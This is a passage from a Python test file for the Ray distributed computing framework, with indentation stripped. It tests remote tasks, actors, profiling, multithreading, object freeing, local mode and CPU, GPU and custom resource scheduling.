ray.wait([l[0]])
@ray.remote
def h(l):
# The argument l should be a list containing one object ID.
ray.get(l[0])
# Make sure that multiple wait requests involving the same object ID
# all return.
x = f.remote(1)
ray.get([g.remote([x]), g.remote([x])])
# Make sure that multiple get requests involving the same object ID all
# return.
x = f.remote(1)
ray.get([h.remote([x]), h.remote([x])])
def test_caching_functions_to_run(shutdown_only):
# Test that we export functions to run on all workers before the driver
# is connected.
def f(worker_info):
sys.path.append(1)
ray.worker.global_worker.run_function_on_all_workers(f)
def f(worker_info):
sys.path.append(2)
ray.worker.global_worker.run_function_on_all_workers(f)
def g(worker_info):
sys.path.append(3)
ray.worker.global_worker.run_function_on_all_workers(g)
def f(worker_info):
sys.path.append(4)
ray.worker.global_worker.run_function_on_all_workers(f)
ray.init(num_cpus=1)
@ray.remote
def get_state():
time.sleep(1)
return sys.path[-4], sys.path[-3], sys.path[-2], sys.path[-1]
res1 = get_state.remote()
res2 = get_state.remote()
assert ray.get(res1) == (1, 2, 3, 4)
assert ray.get(res2) == (1, 2, 3, 4)
# Clean up the path on the workers.
def f(worker_info):
sys.path.pop()
sys.path.pop()
sys.path.pop()
sys.path.pop()
ray.worker.global_worker.run_function_on_all_workers(f)
def test_running_function_on_all_workers(shutdown_only):
ray.init(num_cpus=1)
def f(worker_info):
sys.path.append("fake_directory")
ray.worker.global_worker.run_function_on_all_workers(f)
@ray.remote
def get_path1():
return sys.path
assert "fake_directory" == ray.get(get_path1.remote())[-1]
def f(worker_info):
sys.path.pop(-1)
ray.worker.global_worker.run_function_on_all_workers(f)
# Create a second remote function to guarantee that when we call
# get_path2.remote(), the second function to run will have been run on
# the worker.
@ray.remote
def get_path2():
return sys.path
assert "fake_directory" not in ray.get(get_path2.remote())
def test_profiling_api(shutdown_only):
ray.init(num_cpus=2)
@ray.remote
def f():
with ray.profile(
"custom_event",
extra_data={"name": "custom name"}) as ray_prof:
ray_prof.set_attribute("key", "value")
ray.put(1)
object_id = f.remote()
ray.wait([object_id])
ray.get(object_id)
# Wait until all of the profiling information appears in the profile
# table.
timeout_seconds = 20
start_time = time.time()
while True:
if time.time() - start_time > timeout_seconds:
raise Exception("Timed out while waiting for information in "
"profile table.")
profile_data = ray.global_state.chrome_tracing_dump()
event_types = {event["cat"] for event in profile_data}
expected_types = [
"worker_idle",
"task",
"task:deserialize_arguments",
"task:execute",
"task:store_outputs",
"wait_for_function",
"ray.get",
"ray.put",
"ray.wait",
"submit_task",
"fetch_and_run_function",
"register_remote_function",
"custom_event", # This is the custom one from ray.profile.
]
if all(expected_type in event_types
for expected_type in expected_types):
break
@pytest.fixture()
def ray_start_cluster():
cluster = ray.tests.cluster_utils.Cluster()
yield cluster
# The code after the yield will run as teardown code.
ray.shutdown()
cluster.shutdown()
def test_wait_cluster(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=1, resources={"RemoteResource": 1})
cluster.add_node(num_cpus=1, resources={"RemoteResource": 1})
ray.init(redis_address=cluster.redis_address)
@ray.remote(resources={"RemoteResource": 1})
def f():
return
# Submit some tasks that can only be executed on the remote nodes.
tasks = [f.remote() for _ in range(10)]
# Sleep for a bit to let the tasks finish.
time.sleep(1)
_, unready = ray.wait(tasks, num_returns=len(tasks), timeout=0)
# All remote tasks should have finished.
assert len(unready) == 0
def test_object_transfer_dump(ray_start_cluster):
cluster = ray_start_cluster
num_nodes = 3
for i in range(num_nodes):
cluster.add_node(resources={str(i): 1}, object_store_memory=10**9)
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f(x):
return
# These objects will live on different nodes.
object_ids = [
f._remote(args=[1], resources={str(i): 1}) for i in range(num_nodes)
]
# Broadcast each object from each machine to each other machine.
for object_id in object_ids:
ray.get([
f._remote(args=[object_id], resources={str(i): 1})
for i in range(num_nodes)
])
# The profiling information only flushes once every second.
time.sleep(1.1)
transfer_dump = ray.global_state.chrome_tracing_object_transfer_dump()
# Make sure the transfer dump can be serialized with JSON.
json.loads(json.dumps(transfer_dump))
assert len(transfer_dump) >= num_nodes**2
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_receive"
}) == num_nodes
assert len({
event["pid"]
for event in transfer_dump if event["name"] == "transfer_send"
}) == num_nodes
def test_identical_function_names(shutdown_only):
# Define a bunch of remote functions and make sure that we don't
# accidentally call an older version.
ray.init(num_cpus=1)
num_calls = 200
@ray.remote
def f():
return 1
results1 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 2
results2 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 3
results3 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 4
results4 = [f.remote() for _ in range(num_calls)]
@ray.remote
def f():
return 5
results5 = [f.remote() for _ in range(num_calls)]
assert ray.get(results1) == num_calls * [1]
assert ray.get(results2) == num_calls * [2]
assert ray.get(results3) == num_calls * [3]
assert ray.get(results4) == num_calls * [4]
assert ray.get(results5) == num_calls * [5]
@ray.remote
def g():
return 1
@ray.remote # noqa: F811
def g():
return 2
@ray.remote # noqa: F811
def g():
return 3
@ray.remote # noqa: F811
def g():
return 4
@ray.remote # noqa: F811
def g():
return 5
result_values = ray.get([g.remote() for _ in range(num_calls)])
assert result_values == num_calls * [5]
def test_illegal_api_calls(shutdown_only):
ray.init(num_cpus=1)
# Verify that we cannot call put on an ObjectID.
x = ray.put(1)
with pytest.raises(Exception):
ray.put(x)
# Verify that we cannot call get on a regular value.
with pytest.raises(Exception):
ray.get(3)
# TODO(hchen): This test currently doesn't work in Python 2. This is likely
# because plasma client isn't thread-safe. This needs to be fixed from the
# Arrow side. See #4107 for relevant discussions.
@pytest.mark.skipif(six.PY2, reason="Doesn't work in Python 2.")
def test_multithreading(shutdown_only):
# This test requires at least 2 CPUs to finish since the worker does not
# release resources when joining the threads.
ray.init(num_cpus=2)
def run_test_in_multi_threads(test_case, num_threads=10, num_repeats=25):
"""A helper function that runs test cases in multiple threads."""
def wrapper():
for _ in range(num_repeats):
test_case()
time.sleep(random.randint(0, 10) / 1000.0)
return "ok"
executor = ThreadPoolExecutor(max_workers=num_threads)
futures = [executor.submit(wrapper) for _ in range(num_threads)]
for future in futures:
assert future.result() == "ok"
@ray.remote
def echo(value, delay_ms=0):
if delay_ms > 0:
time.sleep(delay_ms / 1000.0)
return value
@ray.remote
class Echo(object):
def echo(self, value):
return value
def test_api_in_multi_threads():
"""Test using Ray api in multiple threads."""
# Test calling remote functions in multiple threads.
def test_remote_call():
value = random.randint(0, 1000000)
result = ray.get(echo.remote(value))
assert value == result
run_test_in_multi_threads(test_remote_call)
# Test multiple threads calling one actor.
actor = Echo.remote()
def test_call_actor():
value = random.randint(0, 1000000)
result = ray.get(actor.echo.remote(value))
assert value == result
run_test_in_multi_threads(test_call_actor)
# Test put and get.
def test_put_and_get():
value = random.randint(0, 1000000)
result = ray.get(ray.put(value))
assert value == result
run_test_in_multi_threads(test_put_and_get)
# Test multiple threads waiting for objects.
num_wait_objects = 10
objects = [
echo.remote(i, delay_ms=10) for i in range(num_wait_objects)
]
def test_wait():
ready, _ = ray.wait(
objects,
num_returns=len(objects),
timeout=1000.0,
)
assert len(ready) == num_wait_objects
assert ray.get(ready) == list(range(num_wait_objects))
run_test_in_multi_threads(test_wait, num_repeats=1)
# Run tests in a driver.
test_api_in_multi_threads()
# Run tests in a worker.
@ray.remote
def run_tests_in_worker():
test_api_in_multi_threads()
return "ok"
assert ray.get(run_tests_in_worker.remote()) == "ok"
# Test actor that runs background threads.
@ray.remote
class MultithreadedActor(object):
def __init__(self):
self.lock = threading.Lock()
self.thread_results = []
def background_thread(self, wait_objects):
try:
# Test wait
ready, _ = ray.wait(
wait_objects,
num_returns=len(wait_objects),
timeout=1000.0,
)
assert len(ready) == len(wait_objects)
for _ in range(20):
num = 10
# Test remote call
results = [echo.remote(i) for i in range(num)]
assert ray.get(results) == list(range(num))
# Test put and get
objects = [ray.put(i) for i in range(num)]
assert ray.get(objects) == list(range(num))
time.sleep(random.randint(0, 10) / 1000.0)
except Exception as e:
with self.lock:
self.thread_results.append(e)
else:
with self.lock:
self.thread_results.append("ok")
def spawn(self):
wait_objects = [echo.remote(i, delay_ms=10) for i in range(10)]
self.threads = [
threading.Thread(
target=self.background_thread, args=(wait_objects, ))
for _ in range(20)
]
[thread.start() for thread in self.threads]
def join(self):
[thread.join() for thread in self.threads]
assert self.thread_results == ["ok"] * len(self.threads)
return "ok"
actor = MultithreadedActor.remote()
actor.spawn.remote()
ray.get(actor.join.remote()) == "ok"
def test_free_objects_multi_node(ray_start_cluster):
# This test will do following:
# 1. Create 3 raylets that each hold an actor.
# 2. Each actor creates an object which is the deletion target.
# 3. Invoke 64 methods on each actor to flush plasma client.
# 4. After flushing, the plasma client releases the targets.
# 5. Check that the deletion targets have been deleted.
# Caution: if remote functions are used instead of actor methods,
# one raylet may create more than one worker to execute the
# tasks, so the flushing operations may be executed in different
# workers and the plasma client holding the deletion target
# may not be flushed.
cluster = ray_start_cluster
config = json.dumps({"object_manager_repeated_push_delay_ms": 1000})
for i in range(3):
cluster.add_node(
num_cpus=1,
resources={"Custom{}".format(i): 1},
_internal_config=config)
ray.init(redis_address=cluster.redis_address)
@ray.remote(resources={"Custom0": 1})
class ActorOnNode0(object):
def get(self):
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"Custom1": 1})
class ActorOnNode1(object):
def get(self):
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"Custom2": 1})
class ActorOnNode2(object):
def get(self):
return ray.worker.global_worker.plasma_client.store_socket_name
def create(actors):
a = actors[0].get.remote()
b = actors[1].get.remote()
c = actors[2].get.remote()
(l1, l2) = ray.wait([a, b, c], num_returns=3)
assert len(l1) == 3
assert len(l2) == 0
return (a, b, c)
def flush(actors):
# Flush the Release History.
# Current Plasma Client Cache will maintain 64-item list.
# If the number changed, this will fail.
logger.info("Start Flush!")
for i in range(64):
ray.get([actor.get.remote() for actor in actors])
logger.info("Flush finished!")
def run_one_test(actors, local_only):
(a, b, c) = create(actors)
# The three objects should be generated on different object stores.
assert ray.get(a) != ray.get(b)
assert ray.get(a) != ray.get(c)
assert ray.get(c) != ray.get(b)
ray.internal.free([a, b, c], local_only=local_only)
flush(actors)
return (a, b, c)
actors = [
ActorOnNode0.remote(),
ActorOnNode1.remote(),
ActorOnNode2.remote()
]
# Case 1: run this local_only=False. All 3 objects will be deleted.
(a, b, c) = run_one_test(actors, False)
(l1, l2) = ray.wait([a, b, c], timeout=0.01, num_returns=1)
# All the objects are deleted.
assert len(l1) == 0
assert len(l2) == 3
# Case 2: run this local_only=True. Only 1 object will be deleted.
(a, b, c) = run_one_test(actors, True)
(l1, l2) = ray.wait([a, b, c], timeout=0.01, num_returns=3)
# One object is deleted and 2 objects are not.
assert len(l1) == 2
assert len(l2) == 1
# The deleted object will have the same store with the driver.
local_return = ray.worker.global_worker.plasma_client.store_socket_name
for object_id in l1:
assert ray.get(object_id) != local_return
def test_local_mode(shutdown_only):
@ray.remote
def local_mode_f():
return np.array([0, 0])
@ray.remote
def local_mode_g(x):
x[0] = 1
return x
ray.init(local_mode=True)
@ray.remote
def f():
return np.ones([3, 4, 5])
xref = f.remote()
# Remote functions should return by value.
assert np.alltrue(xref == np.ones([3, 4, 5]))
# Check that ray.get is the identity.
assert np.alltrue(xref == ray.get(xref))
y = np.random.normal(size=[11, 12])
# Check that ray.put is the identity.
assert np.alltrue(y == ray.put(y))
# Make sure objects are immutable, this example is why we need to copy
# arguments before passing them into remote functions in python mode
aref = local_mode_f.remote()
assert np.alltrue(aref == np.array([0, 0]))
bref = local_mode_g.remote(aref)
# Make sure local_mode_g does not mutate aref.
assert np.alltrue(aref == np.array([0, 0]))
assert np.alltrue(bref == np.array([1, 0]))
# wait should return the first num_returns values passed in as the
# first list and the remaining values as the second list
num_returns = 5
object_ids = [ray.put(i) for i in range(20)]
ready, remaining = ray.wait(
object_ids, num_returns=num_returns, timeout=None)
assert ready == object_ids[:num_returns]
assert remaining == object_ids[num_returns:]
# Test actors in LOCAL_MODE.
@ray.remote
class LocalModeTestClass(object):
def __init__(self, array):
self.array = array
def set_array(self, array):
self.array = array
def get_array(self):
return self.array
def modify_and_set_array(self, array):
array[0] = -1
self.array = array
test_actor = LocalModeTestClass.remote(np.arange(10))
# Remote actor functions should return by value
assert np.alltrue(test_actor.get_array.remote() == np.arange(10))
test_array = np.arange(10)
# Remote actor functions should not mutate arguments
test_actor.modify_and_set_array.remote(test_array)
assert np.alltrue(test_array == np.arange(10))
# Remote actor functions should keep state
test_array[0] = -1
assert np.alltrue(test_array == test_actor.get_array.remote())
# Check that actor handles work in Python mode.
@ray.remote
def use_actor_handle(handle):
array = np.ones(10)
handle.set_array.remote(array)
assert np.alltrue(array == ray.get(handle.get_array.remote()))
ray.get(use_actor_handle.remote(test_actor))
def test_resource_constraints(shutdown_only):
num_workers = 20
ray.init(num_cpus=10, num_gpus=2)
@ray.remote(num_cpus=0)
def get_worker_id():
time.sleep(0.1)
return os.getpid()
# Attempt to wait for all of the workers to start up.
while True:
if len(
set(
ray.get([
get_worker_id.remote() for _ in range(num_workers)
]))) == num_workers:
break
time_buffer = 0.3
# At most 10 copies of this can run at once.
@ray.remote(num_cpus=1)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(10)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(11)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
@ray.remote(num_cpus=3)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(3)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(4)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
@ray.remote(num_gpus=1)
def f(n):
time.sleep(n)
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(2)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(3)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([f.remote(0.5) for _ in range(4)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
def test_multi_resource_constraints(shutdown_only):
num_workers = 20
ray.init(num_cpus=10, num_gpus=10)
@ray.remote(num_cpus=0)
def get_worker_id():
time.sleep(0.1)
return os.getpid()
# Attempt to wait for all of the workers to start up.
while True:
if len(
set(
ray.get([
get_worker_id.remote() for _ in range(num_workers)
]))) == num_workers:
break
@ray.remote(num_cpus=1, num_gpus=9)
def f(n):
time.sleep(n)
@ray.remote(num_cpus=9, num_gpus=1)
def g(n):
time.sleep(n)
time_buffer = 0.3
start_time = time.time()
ray.get([f.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 0.5 + time_buffer
assert duration > 0.5
start_time = time.time()
ray.get([f.remote(0.5), f.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([g.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
start_time = time.time()
ray.get([f.remote(0.5), f.remote(0.5), g.remote(0.5), g.remote(0.5)])
duration = time.time() - start_time
assert duration < 1 + time_buffer
assert duration > 1
def test_gpu_ids(shutdown_only):
num_gpus = 10
ray.init(num_cpus=10, num_gpus=num_gpus)
@ray.remote(num_gpus=0)
def f0():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=1)
def f1():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=2)
def f2():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 2
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=3)
def f3():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 3
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=4)
def f4():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 4
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
@ray.remote(num_gpus=5)
def f5():
time.sleep(0.1)
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 5
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
for gpu_id in gpu_ids:
assert gpu_id in range(num_gpus)
return gpu_ids
# Wait for all workers to start up.
@ray.remote
def f():
time.sleep(0.1)
return os.getpid()
start_time = time.time()
while True:
if len(set(ray.get([f.remote() for _ in range(10)]))) == 10:
break
if time.time() > start_time + 10:
raise Exception("Timed out while waiting for workers to start "
"up.")
list_of_ids = ray.get([f0.remote() for _ in range(10)])
assert list_of_ids == 10 * [[]]
list_of_ids = ray.get([f1.remote() for _ in range(10)])
set_of_ids = {tuple(gpu_ids) for gpu_ids in list_of_ids}
assert set_of_ids == {(i, ) for i in range(10)}
list_of_ids = ray.get([f2.remote(), f4.remote(), f4.remote()])
all_ids = [gpu_id for gpu_ids in list_of_ids for gpu_id in gpu_ids]
assert set(all_ids) == set(range(10))
remaining = [f5.remote() for _ in range(20)]
for _ in range(10):
t1 = time.time()
ready, remaining = ray.wait(remaining, num_returns=2)
t2 = time.time()
# There are only 10 GPUs, and each task uses 2 GPUs, so there
# should only be 2 tasks scheduled at a given time, so if we wait
# for 2 tasks to finish, then it should take at least 0.1 seconds
# for each pair of tasks to finish.
assert t2 - t1 > 0.09
list_of_ids = ray.get(ready)
all_ids = [gpu_id for gpu_ids in list_of_ids for gpu_id in gpu_ids]
# Commenting out the below assert because it seems to fail a lot.
# assert set(all_ids) == set(range(10))
# Test that actors have CUDA_VISIBLE_DEVICES set properly.
@ray.remote
class Actor0(object):
def __init__(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
# Set self.x to make sure that we got here.
self.x = 1
def test(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 0
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
return self.x
@ray.remote(num_gpus=1)
class Actor1(object):
def __init__(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
# Set self.x to make sure that we got here.
self.x = 1
def test(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert (os.environ["CUDA_VISIBLE_DEVICES"] == ",".join(
[str(i) for i in gpu_ids]))
return self.x
a0 = Actor0.remote()
ray.get(a0.test.remote())
a1 = Actor1.remote()
ray.get(a1.test.remote())
def test_zero_cpus(shutdown_only):
ray.init(num_cpus=0)
@ray.remote(num_cpus=0)
def f():
return 1
# The task should be able to execute.
ray.get(f.remote())
def test_zero_cpus_actor(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=0)
cluster.add_node(num_cpus=2)
ray.init(redis_address=cluster.redis_address)
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote
class Foo(object):
def method(self):
return ray.worker.global_worker.plasma_client.store_socket_name
# Make sure tasks and actors run on the remote local scheduler.
a = Foo.remote()
assert ray.get(a.method.remote()) != local_plasma
def test_fractional_resources(shutdown_only):
ray.init(num_cpus=6, num_gpus=3, resources={"Custom": 1})
@ray.remote(num_gpus=0.5)
class Foo1(object):
def method(self):
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
return gpu_ids[0]
foos = [Foo1.remote() for _ in range(6)]
gpu_ids = ray.get([f.method.remote() for f in foos])
for i in range(3):
assert gpu_ids.count(i) == 2
del foos
@ray.remote
class Foo2(object):
def method(self):
pass
# Create an actor that requires 0.7 of the custom resource.
f1 = Foo2._remote([], {}, resources={"Custom": 0.7})
ray.get(f1.method.remote())
# Make sure that we cannot create an actor that requires 0.7 of the
# custom resource. TODO(rkn): Re-enable this once ray.wait is
# implemented.
f2 = Foo2._remote([], {}, resources={"Custom": 0.7})
ready, _ = ray.wait([f2.method.remote()], timeout=0.5)
assert len(ready) == 0
# Make sure we can start an actor that requries only 0.3 of the custom
# resource.
f3 = Foo2._remote([], {}, resources={"Custom": 0.3})
ray.get(f3.method.remote())
del f1, f3
# Make sure that we get exceptions if we submit tasks that require a
# fractional number of resources greater than 1.
@ray.remote(num_cpus=1.5)
def test():
pass
with pytest.raises(ValueError):
test.remote()
with pytest.raises(ValueError):
Foo2._remote([], {}, resources={"Custom": 1.5})
def test_multiple_local_schedulers(ray_start_cluster):
# This test will define a bunch of tasks that can only be assigned to
# specific local schedulers, and we will check that they are assigned
# to the correct local schedulers.
cluster = ray_start_cluster
cluster.add_node(num_cpus=11, num_gpus=0)
cluster.add_node(num_cpus=5, num_gpus=5)
cluster.add_node(num_cpus=10, num_gpus=1)
ray.init(redis_address=cluster.redis_address)
cluster.wait_for_nodes()
# Define a bunch of remote functions that all return the socket name of
# the plasma store. Since there is a one-to-one correspondence between
# plasma stores and local schedulers (at least right now), this can be
# used to identify which local scheduler the task was assigned to.
# This must be run on the zeroth local scheduler.
@ray.remote(num_cpus=11)
def run_on_0():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the first local scheduler.
@ray.remote(num_gpus=2)
def run_on_1():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the second local scheduler.
@ray.remote(num_cpus=6, num_gpus=1)
def run_on_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This can be run anywhere.
@ray.remote(num_cpus=0, num_gpus=0)
def run_on_0_1_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the first or second local scheduler.
@ray.remote(num_gpus=1)
def run_on_1_2():
return ray.worker.global_worker.plasma_client.store_socket_name
# This must be run on the zeroth or second local scheduler.
@ray.remote(num_cpus=8)
def run_on_0_2():
return ray.worker.global_worker.plasma_client.store_socket_name
def run_lots_of_tasks():
names = []
results = []
for i in range(100):
index = np.random.randint(6)
if index == 0:
names.append("run_on_0")
results.append(run_on_0.remote())
elif index == 1:
names.append("run_on_1")
results.append(run_on_1.remote())
elif index == 2:
names.append("run_on_2")
results.append(run_on_2.remote())
elif index == 3:
names.append("run_on_0_1_2")
results.append(run_on_0_1_2.remote())
elif index == 4:
names.append("run_on_1_2")
results.append(run_on_1_2.remote())
elif index == 5:
names.append("run_on_0_2")
results.append(run_on_0_2.remote())
return names, results
client_table = ray.global_state.client_table()
store_names = []
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"]["GPU"] == 0
]
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"]["GPU"] == 5
]
store_names += [
client["ObjectStoreSocketName"] for client in client_table
if client["Resources"]["GPU"] == 1
]
assert len(store_names) == 3
def validate_names_and_results(names, results):
for name, result in zip(names, ray.get(results)):
if name == "run_on_0":
assert result in [store_names[0]]
elif name == "run_on_1":
assert result in [store_names[1]]
elif name == "run_on_2":
assert result in [store_names[2]]
elif name == "run_on_0_1_2":
assert (result in [
store_names[0], store_names[1], store_names[2]
])
elif name == "run_on_1_2":
assert result in [store_names[1], store_names[2]]
elif name == "run_on_0_2":
assert result in [store_names[0], store_names[2]]
else:
raise Exception("This should be unreachable.")
assert set(ray.get(results)) == set(store_names)
names, results = run_lots_of_tasks()
validate_names_and_results(names, results)
# Make sure the same thing works when this is nested inside of a task.
@ray.remote
def run_nested1():
names, results = run_lots_of_tasks()
return names, results
@ray.remote
def run_nested2():
names, results = ray.get(run_nested1.remote())
return names, results
names, results = ray.get(run_nested2.remote())
validate_names_and_results(names, results)
def test_custom_resources(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(num_cpus=3, resources={"CustomResource": 0})
cluster.add_node(num_cpus=3, resources={"CustomResource": 1})
ray.init(redis_address=cluster.redis_address)
@ray.remote
def f():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource": 1})
def g():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource": 1})
def h():
ray.get([f.remote() for _ in range(5)])
return ray.worker.global_worker.plasma_client.store_socket_name
# The f tasks should be scheduled on both local schedulers.
assert len(set(ray.get([f.remote() for _ in range(50)]))) == 2
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
# The g tasks should be scheduled only on the second local scheduler.
local_scheduler_ids = set(ray.get([g.remote() for _ in range(50)]))
assert len(local_scheduler_ids) == 1
assert list(local_scheduler_ids)[0] != local_plasma
# Make sure that resource bookkeeping works when a task that uses a
# custom resources gets blocked.
ray.get([h.remote() for _ in range(5)])
def test_two_custom_resources(ray_start_cluster):
cluster = ray_start_cluster
cluster.add_node(
num_cpus=3, resources={
"CustomResource1": 1,
"CustomResource2": 2
})
cluster.add_node(
num_cpus=3, resources={
"CustomResource1": 3,
"CustomResource2": 4
})
ray.init(redis_address=cluster.redis_address)
@ray.remote(resources={"CustomResource1": 1})
def f():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource2": 1})
def g():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource1": 1, "CustomResource2": 3})
def h():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource1": 4})
def j():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
@ray.remote(resources={"CustomResource3": 1})
def k():
time.sleep(0.001)
return ray.worker.global_worker.plasma_client.store_socket_name
# The f and g tasks should be scheduled on both local schedulers.
assert len(set(ray.get([f.remote() for _ in range(50)]))) == 2
assert len(set(ray.get([g.remote() for _ in range(50)]))) == 2
local_plasma = ray.worker.global_worker.plasma_client.store_socket_name
# The h tasks should be scheduled only on the second local scheduler.
local_scheduler_ids = set(ray.get([h.remote() for _ in range(50)]))
assert len(local_scheduler_ids) == 1
assert list(local_scheduler_ids)[0] != local_plasma
# Make sure that tasks with unsatisfied custom resource requirements do
# not get scheduled.
ready_ids, remaining_ids = ray.wait([j.remote(), k.remote()], timeout=0.5)
assert ready_ids == []
def test_many_custom_resources(shutdown_only):
num_custom_resources = 10000
total_resources = {
str(i): np.random.randint(1, 7)
for i in range(num_custom_resources)
}
ray.init(num_cpus=5, resources=total_resources)
def f():
return 1
remote_functions = []
for _ in range(20):
num_resources = np.random.randint(0, num_custom_resources + 1)
permuted_resources = np.random.permutation(
num_custom_resources)[:num_resources]
random_resources = {
str(i): total_resources[str(i)]
for i in permuted_resources
}
remote_function = ray.remote(resources=random_resources)(f)
remote_functions.append(remote_function)
remote_functions.append(ray.remote(f))
remote_functions.append(ray.remote(resources=total_resources)(f))
results = []
for remote_function in remote_functions:
results.append(remote_function.remote())
results.append(remote_function.remote())
results.append(remote_function.remote())
ray.get(results)
@pytest.fixture
def save_gpu_ids_shutdown_only():
# Record the curent value of this environment variable so that we can
# reset it after the test.
original_gpu_ids = os.environ.get("CUDA_VISIBLE_DEVICES", None)
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
# Reset the environment variable.
if original_gpu_ids is not None:
os.environ["CUDA_VISIBLE_DEVICES"] = original_gpu_ids
else:
del os.environ["CUDA_VISIBLE_DEVICES"]
def test_specific_gpus(save_gpu_ids_shutdown_only):
allowed_gpu_ids = [4, 5, 6]
os.environ["CUDA_VISIBLE_DEVICES"] = ",".join(
[str(i) for i in allowed_gpu_ids])
ray.init(num_gpus=3)
@ray.remote(num_gpus=1)
def f():
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 1
assert gpu_ids[0] in allowed_gpu_ids
@ray.remote(num_gpus=2)
def g():
gpu_ids = ray.get_gpu_ids()
assert len(gpu_ids) == 2
assert gpu_ids[0] in allowed_gpu_ids
assert gpu_ids[1] in allowed_gpu_ids
ray.get([f.remote() for _ in range(100)])
ray.get([g.remote() for _ in range(100)])
def test_blocking_tasks(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def f(i, j):
return (i, j)
@ray.remote
def g(i):
# Each instance of g submits and blocks on the result of another
# remote task.
object_ids = [f.remote(i, j) for j in range(2)]
return ray.get(object_ids)
@ray.remote
def h(i):
# Each instance of g submits and blocks on the result of another
# remote task using ray.wait.
object_ids = [f.remote(i, j) for j in range(2)]
return ray.wait(object_ids, num_returns=len(object_ids))
ray.get([h.remote(i) for i in range(4)])
@ray.remote
def _sleep(i):
time.sleep(0.01)
return (i)
@ray.remote
def sleep():
# Each instance of sleep submits and blocks on the result of
# another remote task, which takes some time to execute.
